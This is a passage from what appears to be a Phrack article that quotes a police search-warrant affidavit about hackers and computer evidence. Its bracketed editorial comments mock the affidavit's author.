  1545.      [Note:  When a Phrack reporter called Lewis Jackson and asked why after
  1546. his no doubt extensive training he didn't spell "freakers" correctly with a
  1547. 'ph' he reacted rather rudely.]
  1548.  
  1549. 21.
  1550. 22. [Jackson's in depth analysis of what hackers have ("Blue Boxes are
  1551. 23.     normally made from pocket calculators...") and their behavior]
  1552. 24.
  1553.  
  1554. 26.  Through my training and investigations, I have learned that evidence
  1555. stored in computers, floppy disks, and speed dialers is very fragile and can
  1556. be destroyed in a matter of seconds by several methods including but not
  1557. limited to:  striking one or more keys on the computer keyboard to trigger a
  1558. preset computer program to delete information stored within, passing a strong
  1559. magnetic source in close proximity to a computer, throwing a light switch
  1560. designed to either trigger a preset program or cut power in order to delete
  1561. information stored in a computer or speed dialer or computer; or simply
  1562. delivering a sharp blow to the computer.  [Blunt blows don't cut it.]
  1563.  
  1564. 27.  Because of the ease with which evidence stored in computers can be
  1565. destroyed or transferred, it is essential that search warrants be executed at
  1566. a time when the suspect is least likely to be physically operating the target
  1567. computer system and least likely to have access to methods of destroying or
  1568. transferring evidence stored within the system.  Because of the rapidity of
  1569. modern communications and the ability to destroy or transfer evidence remotely
  1570. by one computer to another, it is also essential that in cases involving
  1571. multiple suspects, all search warrants must be executed simultaneously.
  1572.  
  1573. </pre>
  1574. </body>